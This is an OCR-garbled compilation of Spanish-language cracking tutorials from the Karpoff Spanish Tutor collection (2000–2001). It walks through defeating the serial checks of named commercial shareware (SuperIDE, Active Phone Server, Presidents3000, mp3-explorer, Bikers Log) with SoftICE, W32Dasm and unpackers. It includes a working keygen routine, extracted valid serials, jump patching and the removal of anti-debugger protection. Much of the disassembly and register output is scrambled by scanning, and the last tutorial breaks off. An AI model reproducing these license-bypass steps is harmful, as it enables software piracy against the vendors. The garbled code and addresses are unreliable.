KERNEL ! HIMEMCPY 

015F:9EA6 55 PUSH BP <---- Aparecemos aquí 


015F:9EA7 8BEC MOV BP, SP 


015F:9F20 F36766A5 REPZ MOVSD <----— D ESI '999666999' 
015F:9F2A F367A4 REPZ MOVSB <---— ? EDI 'tamaño del Serial="9'</font"> 


[F10] traceamos, hasta llegar a lo siguiente: 


EAX=013798B4 
EDI=00000000 


Cs=0167 ¿nbspDS=0167 


*eax = 531D84 


EBX=00000000  ECX=013798B4 EDX=013798B4 ESI=008BF1A4 


EBP=008BE884 ESP=008BE848 EIP=005240C6 


*ebx = D8CA0OF9E 


*ecx = 531D84 
*edx = 531D84 


0167:00410435 
0167:0041043A 
0167:0041043D 
0167:0041043F 
0167:00410441 
0167:00410442 
0167:00410448 
0167:0041044B 
0167:0041044E 
0167:00410451 
0167:00410457 
0167:0041045C 
0167:0041045F 
0167:00410461 
0167:00410462 
0167:00410467 
0167:0041046A 
0167:0041046F 
0167:00410472 
0167:00410474 
0167:0041047A 
0167:0041047B 
0167:00410480 
0167:00410483 
0167:00410486 


E8367E1200 call 00538270 

8D4DF4 lea ecx, [ebp-$0C] 

33D2 xor edx, edx 

8B01 mov eax, [ecx] 

50 push eax 

66C745E00800 mov word ptr [ebp-$20], $0008 
8955FC mov [ebp-$04], edx 

8D55FC lea edx, [ebp-$04] 

FF45EC inc dword ptr [ebp-$14] 
8B83C4020000 mov eax, [ebx+$02C4]<---— 'Name' 
E8147E1200 call 005382701 

8D4DFC lea ecx, [ebp-$04] 

8B01 mov eax, [ecx] 

50 push eax 


Ss=016F ES=016F FS=392F GS=0000 DS:01379B74=00000000 


BABDF35A00 mov edx, $005AF3BD<---— 'Registered User' 


8D45F8 lea eax, [ebp-$08] 
E871311800 call 005935E0 
FF45EC inc dword ptr [ebp-$14] 
8B08 mov ecx, [eax] 


8B83EC020000 mov eax, [ebx+$02EC]<----— 'Serial' 
5A pop edx 
E864A80300 call 0044ACE4<---- BPX $0167:0041047B 


FF4DEC dec dword ptr [ebp-$14] 
8D45F4 lea eax, [ebp-$0C] 
BA02000000 mov edx, $00000002 


1 En la primera fase del traceo, cuando llegamos a esta CALL, retornamos 


KERNEL ! LOGERROR+0123 


y comenzamos el rastreo del Serial. Seguimos traceando con [F10] y 


antes de llegar a la dirección :0041047B establecemos un BPX 0041047B cuando nos 
posicionamos en esta CALL pulsamos dos veces [F10] y pantallazo, 
programa "victima", mostrandonos el MENSAJE DE ERROR pulsaremos el botón [OK] 


retornaremos al SoftICE, 


seleccionamos 


aparecemos en el 


nos posicionamos en EDX con el botón derecho del ratón, 


"Display" nos movemos hacia arriba [Alt] [PgUp] en la Pantalla de Datos 
hasta observar, lo siguiente: 


Name: +Erfiser 


Serial: 83972826 


Introducimos el Serial 83972826 para el Name HE, Y (d Ser y voilá, nos aperecerá el 


mensaje 


SuperlDE XK] 


Registration Successful. Keep your username and serial number in a safe location: in 
the event the software must be re-installed, the data will be required agair. 


"SuperIDE Registration Successfull!" 


(D) DeDe v2.50 - Estudio de la Rutina de Generación del Key 


Name: +ErO ser 
Serial: 999666999 <..... Serial Dummy 


|- SuperIDE.exe.dpr code -— 
[-] TRegDlg.RegisterBtnClick 


100410530 50 push eax 


¡* Reference to : TWelcomeBox.-“PROC-00410410 () 
00410531 E8DAFEFFFF call 00410410 
00410536 59 pop ecx 

00410537 C3 ret 


¡A A PROC-00410410 () 
00410410 55 push ebp 

00410411 8BEC mov ebp, esp 

00410413 83C4D0 add esp, -$30 

00410416 B838F65A00 mov eax, $005AF638 

0041041B 53 push ebx 

0041041C 8B5D08 mov ebx, [ebp+5$08] 


0041041F E8608C1700 call 00589084 
00410424 33D2 xor edx, edx 

00410426 8955F4 mov [ebp-$0C], edx 
00410429 8D55F4 lea edx, [ebp-$0C] 
0041042C FF45EC inc dword ptr [ebp-$14] 


* Reference to control RegSNEdt : TEdit 


0041042F 8B83C8020000 mov eax, [ebx+$02C8] 


00410435 E8367E1200 call 00538270 

0041043A 8D4DF4 lea ecx, [ebp-$0C] 

0041043D 33D2 xor edx, edx 

0041043F 8B01 mov eax, [ecx] 

00410441 50 push eax 

00410442 66C745E00800 mov word ptr [ebp-$20], $0008 
00410448 8955FC mov [ebp-$04], edx 

0041044B 8D55FC lea edx, [ebp-$04] 

0041044E FF45EC inc dword ptr [ebp-$14] 


0041047A 


0041047B 
00410480 
00410483 
00410486 


10041048B 
00410490 
100410493 
00410496 


10041049B 
004104A0 
1004104A3 
004104A6 


004104AB 
(004104B0 
004104B3 
/'004104BA 
004104BB 
004104BD 
1004104BE 


l* Reference to 


¡* Reference to control RegNameEdt 


00410451 8B83C4020000 mov eax, 


¡* Possible String Reference to: 


00410462 BABDF35A00 mov edx, 
[00410467 8D45F8 lea eax, 


¡* Reference to control AppRegisterl 


100410474 8B83EC020000 mov eax, 


5A pop edx 


E864A80300 
FF4DEC dec 
8D45F4 lea 
BA02000000 


E898321800 
FF4DEC dec 
8D45F8 lea 
BA02000000 


E888321800 
FF4DEC dec 
8D45FC lea 
BA02000000 


E878321800 
8B4DDO mov 


00410457 E8147E1200 call 00538270 
[0041045C 8D4DFC lea ecx, 
0041045F 8B01 mov eax, 
00410461 50 push eax 


[ebp-$04] 
[ecx] 


$005AF3BD 
[ebp-$08] 


/0041046A E871311800 call 005935E0 
0041046F FF45EC inc dword ptr [ebp-$14] 
00410472 8B08 mov ecx, 


[eax] 


call 0044ACE4 
dword ptr [ebp-$14] 
eax, [ebp-$0C] 
mov edx, $00000002 


call 00593728 
dword ptr [ebp-$14] 
eax, [ebp-$08] 
mov edx, $00000002 


call 00593728 
dword ptr [ebp-$14] 
eax, [ebp-$04] 
mov edx, $00000002 


Call 00593728 
ecx, [ebp-$30] 


64890D00000000mov fs: [$0000], 


5B pop ebx 


8BE5 mov esp, 


5D pop ebp 
C3 ret 


Para no hacer este Manual un "peñazo" 
¡Generación del Serial: 


ebp 


1 Recorre desde el 1? caracter hasta el último del Name, 
Posición de cada caracter del Name 


jejeje;), 


TEdit 


[ebx+$02C4] 


'Registered User' 


TAppRegister 


[ebx+$02EC] 


TAppRegister.RegisterApp () 


ecx 


os voy a RESUMIR el proceso de 


guardando la 
FOR i=1 TO Len (Name) 


2 Multiplica N”* Mágico 76EFh (=30447) por la Posición de cada caracter 
y por su valor ASCII hasta finalizar el recorrido del Name. 


3 y Acumulamos el Resultado, y voilá ... obtenemos el SERIAL! 


About this program... 


« SuperlDE 


Proyram Factory!!! 
1.42.186 


Michael Powers, 91998 ALL RIGHTS RESERVED 


Registration Information 


Register to stay current with SuperlDE!! E E 
Join the SuperlDE mailing list to recievye Registration removes the adbar from 
updates, tips, tricks, news, etc. the application 


Click Here. 
Status: REGISTERED! 3) 
POWERED Name: +Er(dser 


2 EH Borland Serial Number: 83972826 
243 Builder 
Go to to the registration site | 
SuperlDE Home Page 


Send a suggestion / bug report 


' Nombre : SuperIDE v1.2.4.186 Keygenerator 
' Autor : +ErOser'2000 [fOR tHE nEW mILLENNIUM] 
' Creado : Sabado, Marzo 31,2001 E 00:45:22 pm (Vers: 1.0.0000) 
' Herramientas: Softlce 4.05, Visual Basic 6 


' Descripción : SuperIDE v1.2.4.186 


Private Sub Text1_Change() 
Dim user_name As String 
Dim L As Integer, x As Integer, posicion as Integer 
Dim magico As Double, key As Double 
Const numero As Double = £H76EF 


user_name = Trim$(Text1.Text) 'quitamos blancos 

L = Len(user_name) 

x=0 
For x=1 To L 
posicion = x 'nos guardamos la posición. 
magico = posicion * numero 'multiplicamos la posicion x n?magico (76EFh) 
user_name = Asc(Mid$(Textl.Text, x, 1)) * magico 

key = key + user_name 

Next x 
Text2.Text = key 'Visualizamos el Serial 
End Sub 


Un Saludo! 


+Erfser'2000 
fOR tHE nEW mILLENNIUM 


==/X/X/- Your Mind Is the Power -—/X/X/=- 


si + Agradecimientos t----- - 
Karpoff, Demian, Black Fenix, Prffesor X, Numit_oR, Esiel 2, Mr. Crimson, Mr. WhiTe, Mr. 
GReeN, TNT, WKT, KUT y a TODOS los CrAcKeRs del Pasado, Presente y Futuro. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Active Phone Server v9.13 


Serial. 


Registrar el programa como sea :) 


Newbie 


http: //www.softcab.com 


file insPEctor, Softl CE 
Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo primer tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 


En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 


tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa 


Programa que sirve para manejar las llamadas telefónicas. 


Lo que nos interesa... el programa es distribuido como shareware con libre evaluación de 30 días, y para 
seguir utilizando el programa después de este período debes registrarte y para eso debes pagar la suma de ? 


Contamos con Softl CE :) ... 


| Manos a la Obra | 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 


importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


Mmm, esta vez me ha fallado la opción que dice Compilador, dice: No encontrado :(, pero si vamos a la 
opción Secciones, podemos deducir que está empacado con UPX :), pero esto no importará para nada a la 
hora de crackear este programa, por que el método que usaremos es bastante especial, debido al débil 
sistema de protección del programa :) 


A continuación... cerramos file insPEctor v3.5 y abrimos Active Phone Server v9.13 


Abrimos el programa, presionamos el botón > luego le damos click a About... y abajo del rectángulo 
está el botón Enter the registration key, lo presionamos y por fin estaremos en la caja de registro, la que 
nos pide los siguientes datos: 


Your name: 
Key: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Enter y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Registration 


ou have entered wrong key. 


Please try again. 


A continuación... cerramos Active Phone Server v9.13 


| Usando el SoftlCE | 


Asumo que tienes bien configurado el Softl CE y que tienes al menos conocimientos básicos sobre su uso. 


A continuación...abrimos Active Phone Server y vamos directamente a la caja de registro en donde 
introducimos nuestro nombre, y cualquier código de registro. Todavía no damos click en Enter ; lo que ahora 
debemos hacer es presionar CONTROL+D para que salte el Softl CE y así poder colocar nuestro breakpoint. 


Ya estamos dentro del Softl CE...colocamos bpx hmemcpy y presionamos ENTER, luego presionamos F5 


para salir del Softl CE. Ahora le damos click a Enter y si todo sale bien el bpx debería picar y hace saltar al 
Softl CE. 


Luego presionamos F11 1 vez y F12 8 veces para caer aquí... (asegúrate que KERNEL pase a USER (04) ) 


:10016CB4 8D8C2410040000 E ECX, [ESP+00000410] <== caemos aquí, seguimos con F10 


Luego de caer ahí, le damos a F10 20 veces para caer aquí... 


:10016CFF 8D942410040000 EDX, [ESP+00000410] 
:10016D06 51 ECX 

:10016D07 52 EDX 

:10016D08 E873FCFFFF 10016980 


:10016D0D 83C408 ESP, 08 
:10016D10 85C0 EAX, EAX 
:10016D12 0F84E2800000 10016DFA <== aquí invertimos el salto con r fl z 


Luego de darle 20 veces a F10 caemos en el salto 10016D12 y aquí invertimos el salto con el comando r fl z, 
luego presionamos F5 y vemos esto... 


Registration 


hank you for your support! 


Mmm, nos hemos registrado pero quizás sólo hasta reiniciar el programa supongo, como pasa casi siempre 
cuando usamos este comando (r fl z) ya que el cambio se produce sólo en memoria, pero ha sucedido algo 
que no hemos visto, en la carpeta donde está instalado el programa se ha creado un archivo llamado 


Aon. key y si reiniciamos el programa este estará registrado con nuestro nombre de usuario, entonces eso 
quiere decir que una vez que ha entrado el registro no hay vuelta que darle. :) 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoO hotmail.com 


| Saludos | 


e PrOfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Presidents3000 v1.0.1 


Serial. 


Conseguir un código de registro válido 


Newbie 


http: //www.winograd.com 


file insPEctor, Softl CE 
Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo segundo tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 


En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 


tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ 5.0 
e No está empacado 


A continuación... cerramos file insPEctor v3.5 y abrimos Presidents3000 v1.0.1 


Abrimos el programa, le vamos al menú: File > Register... y nos encontramos con la caja de registro, la que 
nos pide los siguientes datos: 


Name: 
SerialHt: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Register y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Presidents3000 


Sorry! Registration not accepted. Please re-enter the required information exactly as 


received. 


A continuación... cerramos Presidents3000 v1.0.1 


| Usando el SoftlCE | 


Asumo que tienes bien configurado el Softl CE y que tienes al menos conocimientos básicos sobre su uso. 


A continuación...abrimos Presidents3000 y vamos directamente a la caja de registro en donde introducimos 
nuestro nombre, y cualquier código de registro. Todavía no damos click en Register ; lo que ahora debemos 
hacer es presionar CONTROL+D para que salte el Soft! CE y así poder colocar nuestro breakpoint. 


Ya estamos dentro del Softl CE...colocamos bpx hmemcpy y presionamos ENTER, luego presionamos F5 para 
salir del Softl CE. Ahora le damos click a Enter y si todo sale bien el bpx debería picar y hace saltar al Softl CE. 


Luego presionamos F11 1 vez y F12 8 veces para caer aquí... 


:00406E42 8D54240C LEA EDX, [ESP+0C]<== caemos aquí, seguimos con F10 
:00406E46 6A1E PUSH  0000001E 

:00406E48 52 PUSH  EDX 

:00406E49 68ED030000 PUSH  000003ED 

:00406E4E 53 PUSH  EBX 

:00406E4F FFD6 CALL  ESI 

:00406E51 8D44240C EA EAX, [ESP+0C] 

:00406E55 8D8C248C000000 EA ECX, [esp+0000008C] 

:00406E5C 50 PUSH  EAX <== d eax = nuestro número de serie falso 
:00406E5D 51 PUSH  ECX <== d ecx = nuestro nombre 

:00406E5E E89D020000 CALL 00407100 <== entramos con F8 

:00406E63 830408 ADD ESP, 00000008 

:00406E66 663D0100 CMP AX, 0001 

:00406E6A 0F85A7000000  JNZ 00406F17 <== con rfl z nos muestra el mensaje de registro aceptado 
:00406E70 8D94240C010000 LEA EDX, [ESP+0000010C] 


Entramos en la CALL 00406E5E con F8, para caer aquí... 


:00407100 8B4C2404 MOV ECX, [ESP+04] <== caemos aquí, seguimos con F10 
:00407104 81EC80000000 SUB ESP, 00000080 

:0040710A 8D442400 LEA EAX, [ESP+00] 

:0040710E 50 PUSH EAX 

:0040710F 51 PUSH ECX 

:00407110 ESBBFEFFFF CALL 00406FDO 

:00407115 83C408 ADD ESP, 08 

:00407118 6685C0 TEST AX, AX 

:0040711B 7507 JNZ 00407124 <== nos dejamos llevar por este salto 
:0040711D 810480000000 ADD ESP, 00000080 

:00407123 C3 RET 

:00407124 53 PUSH EBX <== caemos aquí, seguimos con F10 
:00407125 56 PUSH ESI 

:00407126 8BB42490000000 MOV ESI, [ESP+00000090] 

:0040712D 8D442408 LEA EAX, [ESP+08] 

:00407131 8A10 MOV DL, [EAX] <== d eax = NUESTRO CÓDIGO DE REGISTRO VÁLIDO 
:00407133 8A1E MOV BL, [ES1I] 

:00407135 BACA MOV CL,DL 

:00407137 3AD3 CMP DL, BL 

:00407139 752F JNZ 0040716A 


Al colocar d eax en el MOV 00407131 tendremos nuestro código de registro válido, en mi caso la caja quedaría 
así... 


Name: Act MagO 
Serial: HP3KPC-99655 


Le damos click a Register y... 


Presidents3000 


Registration Accepted. Thank you very much. 


Programa crackeado... 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoGU'hotmail.com 


e PrOfEsOr X ( my best friend ) 


e [KRaViTZ] ( suerte amigo ) 


[ DeK_OIN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www,.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: [ mp3 - explorer ] v4.3.0 


PROTECCION: Serial. 

Objetivo: Encontrar el número de registro 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD: http: //www.mp3-explorer.com 

Herramientas: file insPEctor v4.2001, W32Dasm v8.93, Softl CE v4.05 

CRACKER: Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo cuarto tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 
tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SOLO CON PROPOSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa 


Programa para reproducir y manejar los archivos MP3. 


Lo que nos interesa... el programa es distribuido como shareware con libre uso de 30 días, después de este 
período debes registrarte y para eso debes pagar la suma de $20 dólares. 


Pero contamos con Softl CE :)... 


| Manos a la Obra | 


Antes de abrir el programa lo analizamos con file insPEctor v4.2001 el que nos mostrará información 
realmente importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará lo siguiente: 


e Compilado con Microsoft Visual C++ 5.0 
A continuación... cerramos file insPEctor v4.2001 y abrimos [ mp3 - explorer ] v4.3.0 


Abrimos el programa, nos vamos al botón ? > About [ mp3 - explorer ]... ,luego presionamos la lengúeta 
Registration y luego el botón Enter Registration Info y ahora por fin estamos en la caja de registro la que 
nos pide los siguientes datos: 


E-mail adress: 
Registration key: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a OK y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


[ mp3 - explorer ] 


Registration info are not correct! 


Please try again. 


A continuación... cerramos [ mp3 - explorer ] y abrimos W32Dasm 


Usando el W32Dasm 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos 
la carpeta en donde está instalado el programa y abrimos el archivo mp3 explorer.exe 


Una vez desensamblado el archivo vamos a Refs > String Data References y buscamos aquel mensaje que 
nos decía que el registro era inválido: se verá así... 


"My favourite addresses" 

"[mp3-explorer] is shareware. Please register yo" 
"Registration Online Information" 

"Thanks for registering[| mp3-explorer]!" 
"Registration info are not correct ! Please try again." 
"You are using an unregistered copy of[ mp3 explore" 
"register.htm" 

"File '%1' not found !Do you want to refresh displayed info" 
"No predefined format found.Formats are mandatory for multi" 


Le damos click varias veces para ver cuantas referencias tiene ese string y nos encontramos con 2 
referencias. 


e La primera: 


:00401B2D EB17 


mp 00401B46 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401AA4 (C) <=== de aquí viene 


* Possible Reference to String Resource ID=00154: "Registration info are not correct ! 
Please try again." 


:00401B2F 6894000000 push 0000009A 
:00401B34 8D4C2410 lea ecx, dword ptr [esp+10] 
:00401B38 E867330500 call 00454EA4 


La he seguido yendo al pedazo de código en que se encuentra el salto (Goto > Goto Code Location) y la he 
analizado pero cuando le ponemos un BPX al salto o a una de las CALLS que se encuentran arriba usando el 
Loader del SoftlCE y luego vamos al registro y le damos a OK, el Softl CE no rompe :(, entonces vamos a la 
segunda... 


e La segunda: 


:00405703 EB20 


jmp 00405725 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004056AF (C) <=== de aquí viene 


* Possible Reference to String Resource ID=00154: "Registration info are not correct ! 
Please try again." 


:00405705 6894000000 push 0000009A 
:0040570A 8D4C2408 lea ecx, dword ptr [esp+08] 
:0040570E E891F70400 call 00454EA4 


Ahora la vamos a seguir yendo a Goto > Goto Code Location e insertamos la dirección 004056AF, se verá 
así... 


:00405696 E8CDEFO400 call 00454668 

:0040569B B968144B00 mov ecx, 004B1468 

:004056A0 C684248400000001 mov byte ptr [esp+00000084], 01 
:004056A8 E8332E0100 call 004184E0 <=== a esta le ponemos el BPX 
:004056AD 85C0 test eax, eax 

:004056AF 7454 je 00405705 <=== aquí caemos 
:004056B1 8D4C246C lea ecx, dword ptr [esp+6C] 
:004056B5 51 push ecx 

:004056B6 B978164B00 mov ecx, 004B1678 

:004056BB E86CF30400 call 00454A2C 

:004056C0 8D542470 lea edx, dword ptr [esp+70] 
:004056C4 B974164B00 mov ecx, 004B1674 

:004056C9 52 push edx 

:004056CA E85DF30400 call 00454A2C 

:004056CFr B968144B00 mov ecx, 004B1468 

:004056D4 E8072F0100 call 004185E0 


* Possible Reference to String Resource ID=00153: 


"Thanks for registering 


[mp3-explo 


:004056D9 6899000000 push 00000099 


Le vamos a poner un bpx a la CALL 00405648 utilizando el Symbol Loader del Softl CE. 


Usando el SoftlCE 


Abrimos el Symbol Loader y vamos a File > Open Module... buscamos el ejecutable del programa, lo 
abrimos y luego vamos a Module > Load y cuando nos salga el mensaje de que ha ocurrido un error, 
seguimos adelante. 


El Softl CE romperá y en ese instante ponemos el breakpoint bpx 00405648 [ENTER] > [F5], nos saldrá el 
programa y lo que ahora debemos hacer es ir a la caja de registro, poner el e-mail, cualquier número de 
registro y darle click a OK, y como hemos puesto el breakpoint el Softl CE romperá nuevamente dejándonos 
aquí... 


C684248400000001 BYTE PTR [ESP+00000084], 01 

E8332E0100 0041840 <=== caemos aquí, le damos una vez a F10 
85C0 FAX, EAX <=== ? edx = NÚMERO DE SERIE VÁLIDO 
7454 00405705 

8D4C246C E ECX, [ESP+6C] 


51 ECX 


B978164B00 ECX,004B1678 
E86CF30400 00454A2C 


Al colocar ? edx en el TEST 004056AD veremos esto: 

0000118633 

Ya tenemos nuestro número de registro válido, en mi caso la caja quedaría así... 
E-mail adress: actmagoO hotmail.com 

Registration key: 118633 


Le damos click a OK y... 


[ mp3 - explorer ] 


hanks for registering [ mp3 - explorer ]! 


La caja de registro no sólo recibe tu correo electrónico, también puedes registrar el programa con tu nombre. 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoGU'hotmail.com 


| Saludos | 


e ProOfEsOr X ( my best friend ) 


e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http: //www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


| Chao!! | 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 24 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: — Bikers Log v3.5 


PROTECCION: Serial. 

Objetivo: Quitar el anti-Softl CE, desempacar, encontrar el código de registro 
Descripcion: 

Dificultad: cracker con experiencia 

DOWNLOAD: http: //www.techmarc.co.uk 

Herramientas: file insPEctor, W32Dasm, ProcDump, Frogs!lCE, UnAspack v1.0.9.1, Hex Workshop 
CRACKER: Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo tercer tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. En 
este tutorial usaremos el SoftlCE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 
tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SOLO CON PROPOSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa | 


Programa para ciclistas que sirve para documentar todos los detalles de un corredor. 


Lo que nos interesa... el programa es distribuido como shareware limitado a 15 corredores y para tener la versión full 
del programa debes registrarte y para eso pagar la suma de $30 dólares. 


Pero eso tiene solución porque contamos con un pelotón de excelentes herramientas :) ... 


| Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente importante 
a la hora de atacar el programa; bueno el file insPEctor nos mostrará lo siguiente: 


e El programa está empacado con ASPack v1.08.04 
A continuación... cerramos file insPEctor v3.5 y abrimos Bikers Log v3.5 


Mmm, le damos doble click y no pasa nada... el programa no carga y por casualidad tengo cargado el Softl CE, por lo 
que podemos determinar que el programa está protegido contra el Softl CE... y para estar 100% seguros echamos a 
andar el FrogslCE y curiosamente el programa ahora si carga; en conclusión: 


Ya tenemos dos problemas que resolver: 


e El programa está empacado 
e El programa indudablemente tiene protección ANTI -Softl CE 


Ahora dentro del programa vamos a la caja de registro presionando un enorme botón que se ve a simple vista; una vez 
que estamos en la caja insertamos lo que sea y vemos esto... 


Invalid Unlock Code. 


El código de registro lo podemos conseguir fácilmente con el Softl CE, pero vamos por parte: lo primero que debemos 
hacer es desempacar el programa para quitarle la protección ANTI-Softl CE, porque imagínense cargando el Frogsl CE 
cada vez que van a usar el programa, sería un plomazo enorme. 


A continuación... cerramos Bikers Log v3.5 y abrimos UnAspack v1.0.9.1 


| Desempacando 


Abrimos el UnAspack, le damos click al botón que tiene los tres puntitos para buscar el ejecutable del programa 
(Biker.exe), una vez que lo hemos encontrado presionamos Unpack y el programa será desempacado rápidamente 
(yo he quedado sorprendido), para asegurarnos de que ha hecho su trabajo de forma satisfactoria lo analizamos 
nuevamente (Biker.exe) con el file insPEctor, el que ahora puede reconocer el compilador sin el paquete: 


e Borland/Inprise Delphi 4 


Seguimos en el file insPEctor, presionamos la lengúeta que dice Secciones para constatar de que todo esté bien, y 
ahora que estamos en Secciones nos damos cuenta que en Characteristics no hay ningún E0000020, todos son 
C0000040 y por lo que yo tengo entendido debe haber al menos un E0000020 para poder desensamblarlo 
correctamente. 


A continuación... cerramos file insPEctor y abrimos ProcDump 


Fino 7] 


Ya en el ProcDump presionamos PE Editor y buscamos el ejecutable del programa (Biker.exe) una vez encontrado 
nos aparecerá el cuadro PE Structure Editor presionamos el botón Sections y una vez que estamos ahí, hacemos 
click con el botón derecho del mouse en la sección CODE para que nos aparezca el menú y luego click en Edit Section 
para llegar al lugar que nos interesa Modify section value. Al frente de Section Characteristics y abajo del RVA y 
el Offset está lo que buscamos: CO000040. 


Lo modificamos dejándolo en: EO0000020 


A continuación... cerramos el ProcDump y abrimos el W32Dasm 


Usando el W32Dasm | 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos la 
carpeta en donde está instalado el programa y abrimos el archivo Biker.exe 


El archivo ha demorado mucho tiempo en desensamblarse , pero una vez desensamblado el archivo vamos a Refs > 
String Data References y buscamos las marcas del ANTI -Softl CE: se verá algo así... 


"[Date]>" 
"[Date]>=" 
dí 

"[YY]" 

ps" 
NAS 
"NV ANTI CE” 
"NA SICE" 
"highlight" 


Son dos y están juntas, creo que por el nombre no hay duda de lo que hacen, ahora le damos doble click a la primera 
para caer aquí... 


:006DE81D 6880000000 push 00000080 
:006DE822 6A03 push 00000003 
:006DE824 6A00 push 00000000 
:006DE826 6A03 push 00000003 
:006DE828 68000000C0 push C0000000 


* Possible StringData Ref from Code Obj ->"AX.ANTICE" 


:006DE82D 6848E86D00 push 006DE848 


* Reference To: kernel32.CreateFileA, Ord:0000h 


:006DE832 E8D596D2FF Call 00407F0C 

:006DE837 83F8FF cmp eax, FFFFFFEFF 

:006DE83A 7408 je 006DE844 <== la zona caliente :) 
:006DE83C 50 push eax 


Ya vamos teniendo una idea de lo que debemos hacer... ahora le damos doble click a la segunda para caer aquí... 


:006DE7E1 6880000000 push 00000080 
:006DE7E6 6A03 push 00000003 
:006DE7E8 6A00 push 00000000 
:OO6DE7EA 6A03 push 00000003 
